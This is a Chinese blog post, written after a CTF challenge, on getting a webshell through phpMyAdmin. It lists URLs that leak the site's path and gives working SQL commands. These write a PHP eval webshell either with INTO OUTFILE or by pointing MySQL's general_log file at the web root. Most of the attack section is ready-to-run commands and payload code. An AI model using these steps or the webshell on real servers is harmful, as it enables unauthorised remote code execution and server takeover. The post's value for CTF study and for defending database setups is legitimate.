Fork me on GitHub

phpmyadmin提权

前言

想到写这么一篇文章只要是之前三叶草的ctf出过这样一题,当时还是问的学长… 当然ctf还是学到东西为主,这里仔细研究一下。

思路

说道phpmyadmin,首先爆破进后台然后写马那shell。进后台就不说了,进不了还搞什么。然后就是写一句话,这有个前提就是得知道网站绝对路径不然你往哪里写。

爆路径

1、最直接的phpinfo页面

2、select @@datadir;可以查看网站使用的什么套件,phpstudy、xampp等,用默认路径进行尝试。或者select load_file();读取apache等容器配置文件。

3、phpmyadmin报错

1. /phpmyadmin/libraries/lect_lang.lib.php
2./phpMyAdmin/index.php?lang[]=1
3. /phpMyAdmin/phpinfo.php
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
5./phpmyadmin/libraries/select_lang.lib.php
6./phpmyadmin/libraries/lect_lang.lib.php
7./phpmyadmin/libraries/mcrypt.lib.php

emmm,本地新版本测试一个都没成功。。。 不行再试试php报错那一套,主要还是靠运气去猜…

提权

说道写shell不得不说 MYSQL secure_file_priv对读写文件的影响。首先我们先查看这个参数的值

SHOW VARIABLES LIKE "secure_file_priv";

我们直接写马上传

select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'C:\phpStudy\PHPTutorial\WWW\shell.php'

可以看到这样是传不上去的,并且错误原因已经给出来了。

secure_file_priv的值为null ,表示限制mysql不允许导入|导出

当secure_file_priv的值为/tmp/ ,表示限制mysql的导入|导出只能发生在/tmp/目录下

当secure_file_priv的值没有具体值时,表示不对mysql的导入|导出做限制

这个时候就可以利用(general_log、general_log file)日志文件getshell,general_log就是记录输入的日志文件,general_log file就是规定日志保存在哪个路径,我们只要输入一句话然后保存网站目录下的php文件就OK了。

SHOW VARIABLES LIKE 'general%';

设置general_log为on,并且把日志存放路径设置为网站根目录。

set global general_log = "ON";

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';

这时候我们查询

select '<?php eval($_POST[cmd]);?>';

可以看到木马插入成功,三句话getshell成功。这个方法最早17年三月就看到有大牛在博客上发出来了,滋滋好的姿势还是要自己研究等现成的怕是别人玩腻了自己才知道。。。

文章作者:Phyb0x

最后更新:2020年01月12日 09:01:20

原始链接:http://yoursite.com/2018/10/04/phpmyadmin%E6%8F%90%E6%9D%83/

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 3.0 许可协议,转载请注明出处!

万一有人点了呢!